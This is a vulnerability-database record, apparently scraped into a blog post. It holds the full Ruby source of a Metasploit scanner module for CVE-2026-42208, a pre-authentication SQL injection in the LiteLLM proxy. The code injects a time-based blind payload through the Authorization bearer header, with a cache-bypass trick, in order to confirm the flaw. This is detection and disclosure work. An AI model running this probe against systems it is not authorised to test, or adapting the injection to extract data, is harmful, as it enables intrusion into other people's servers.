{“lastseen”:”2026-06-24T19:36:58″,”description”:”This module detects BerriAI LiteLLM proxy servers affected by CVE-2026-42208, an unauthenticated SQL injection. During API-key verification the proxy interpolates the raw Authorization bearer value into a PostgreSQL query WHERE v.token = ” without…”,”published”:”2026-06-24T19:04:51″,”modified”:”2026-06-24T19:04:51″,”type”:”metasploit”,”title”:”BerriAI LiteLLM Proxy Pre-Auth SQL Injection Scanner”,”source”:””,”references”:””,”id”:”MSF:AUXILIARY-SCANNER-HTTP-LITELLM_PROXY_SQLI-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-42208″],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Auxiliary\\n include Msf::Exploit::Remote::HttpClient\\n include Msf::Auxiliary::Scanner\\n include Msf::Auxiliary::Report\\n include Msf::Exploit::SQLi\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘BerriAI LiteLLM Proxy Pre-Auth SQL Injection Scanner’,\\n ‘Description’ =\\u003e %q{\\n This module detects BerriAI LiteLLM proxy servers affected by\\n CVE-2026-42208, an unauthenticated SQL injection. During API-key\\n verification the proxy interpolates the raw Authorization bearer value\\n into a PostgreSQL query (WHERE v.token = ‘\\u003ctoken\\u003e’) without\\n parameterization. Because LiteLLM only hashes tokens that begin with\\n \\”sk-\\”, a bearer value that does not start with \\”sk-\\” reaches the query\\n verbatim and is injectable. The failure path that performs the lookup is\\n reachable before authentication. Affected versions are 1.81.16 through\\n 1.83.6 (fixed in 1.83.7).\\n\\n The module confirms the flaw with a benign time-based check built on the\\n framework’s PostgreSQL time-based blind SQL injection library. It issues a\\n request whose injected predicate sleeps only when a tautology is true and a\\n second request whose predicate never sleeps, and reports the target\\n vulnerable only when the first is delayed while the second returns promptly.\\n A server that is merely slow delays both requests and is not flagged. The\\n module does not read or exfiltrate data.\\n\\n Detection requires the target to have provisioned at least one virtual\\n key. The injectable predicate sits in a WHERE clause that PostgreSQL\\n evaluates only against matching rows, so when the token table is empty\\n the pg_sleep never executes and the proxy appears (falsely) safe. Any\\n LiteLLM proxy in real use has issued keys; a freshly initialized proxy\\n with an empty token table may not respond to the time-based probe.\\n },\\n ‘Author’ =\\u003e [\\n ‘Tencent YunDing Security Lab’, # vulnerability discovery\\n ‘Kenneth LaCroix’ # Metasploit module\\n ],\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2026-42208’],\\n [‘GHSA’, ‘r75f-5x8p-qvmc’],\\n [‘URL’, ‘https:\/\/bishopfox.com\/blog\/cve-2026-42208-pre-authentication-sql-injection-in-litellm-proxy’]\\n ],\\n ‘DisclosureDate’ =\\u003e ‘2026-04-20’,\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [],\\n ‘SideEffects’ =\\u003e [IOC_IN_LOGS]\\n },\\n ‘DefaultOptions’ =\\u003e { ‘RPORT’ =\\u003e 4000, ‘SSL’ =\\u003e false }\\n )\\n )\\n\\n register_options(\\n [\\n OptString.new(‘TARGETURI’, [true, ‘The LiteLLM chat completions endpoint’, ‘\/v1\/chat\/completions’]),\\n OptString.new(‘MODEL’, [true, ‘Model name placed in the request body (need not be a real model)’, ‘gpt-3.5-turbo’])\\n ]\\n )\\n\\n # Msf::Exploit::SQLi registers SqliDelay with a 1.0s default. A single second\\n # is easily lost in network jitter for a remote time-based check, so raise the\\n # default to give a clearer signal while still letting the user tune it.\\n register_advanced_options(\\n [\\n OptFloat.new(‘SqliDelay’, [false, ‘Seconds to pg_sleep for the time-based check’, 5.0])\\n ]\\n )\\n end\\n\\n # Best-effort fingerprint via the unauthenticated \/health endpoint.\\n def fingerprint\\n res = send_request_cgi(‘method’ =\\u003e ‘GET’, ‘uri’ =\\u003e normalize_uri(‘health’))\\n return nil unless res\\n\\n key = res.headers.keys.find { |k| k.casecmp?(‘x-litellm-version’) }\\n return \\”LiteLLM #{res.headers[key]}\\” if key\\n return ‘LiteLLM \/health’ if res.code == 200\\n\\n nil\\n end\\n\\n # pg_sleep is evaluated once per matching row, so a populated token table can\\n # delay the response by several multiples of SqliDelay; add a fixed margin for\\n # the network round-trip on top of that.\\n def request_timeout\\n (datastore[‘SqliDelay’] * 4 + 20).ceil\\n end\\n\\n # Builds the time-based blind SQLi probe. The framework library hands our block\\n # the boolean predicate to test; we break out of the WHERE v.token = ‘\\u003ctoken\\u003e’\\n # string literal, OR in that predicate, and comment out the trailing quote. A\\n # bearer that does not begin with \\”sk-\\” is interpolated verbatim, so the quote\\n # reaches the query and the injection lands. The random suffix sits inside the\\n # SQL comment (so it is inert) but makes every bearer unique, which defeats\\n # LiteLLM’s in-memory API-key auth cache: a repeated token would otherwise be\\n # served from cache and skip the database, suppressing the pg_sleep.\\n def create_litellm_sqli\\n create_sqli(dbms: PostgreSQLi::TimeBasedBlind) do |payload|\\n body = {\\n ‘model’ =\\u003e datastore[‘MODEL’],\\n ‘messages’ =\\u003e [{ ‘role’ =\\u003e ‘user’, ‘content’ =\\u003e ‘x’ }],\\n ‘max_tokens’ =\\u003e 1\\n }.to_json\\n send_request_cgi(\\n {\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path),\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘headers’ =\\u003e { ‘Authorization’ =\\u003e \\”Bearer ‘ OR #{payload}– #{Rex::Text.rand_text_alphanumeric(8)}\\” },\\n ‘data’ =\\u003e body\\n },\\n request_timeout\\n )\\n end\\n end\\n\\n def check_host(_ip)\\n fp = fingerprint\\n if create_litellm_sqli.test_vulnerable\\n Exploit::CheckCode::Vulnerable(\\”Time-based SQL injection via Authorization header confirmed#{fp ? \\” (#{fp})\\” : ”}\\”)\\n else\\n Exploit::CheckCode::Safe(‘No time-based SQL injection signal observed’)\\n end\\n end\\n\\n def run_host(ip)\\n code = check_host(ip)\\n unless code == Exploit::CheckCode::Vulnerable\\n print_status(\\”#{peer} – #{code.message}\\”)\\n return\\n end\\n\\n print_good(\\”#{peer} – #{code.message}\\”)\\n report_vuln(\\n host: rhost,\\n port: rport,\\n name: name,\\n info: ‘Time-based blind SQLi via Authorization header (pg_sleep)’,\\n refs: references\\n )\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/auxiliary\/scanner\/http\/litellm_proxy_sqli.rb”,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/litellm_proxy_sqli\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-06-24T19:36:58″,”description”:”This module detects BerriAI LiteLLM proxy servers affected by CVE-2026-42208, an unauthenticated SQL injection. During API-key verification the proxy interpolates the raw Authorization bearer value…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,169,13,7,11,5],"class_list":["post-65510","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n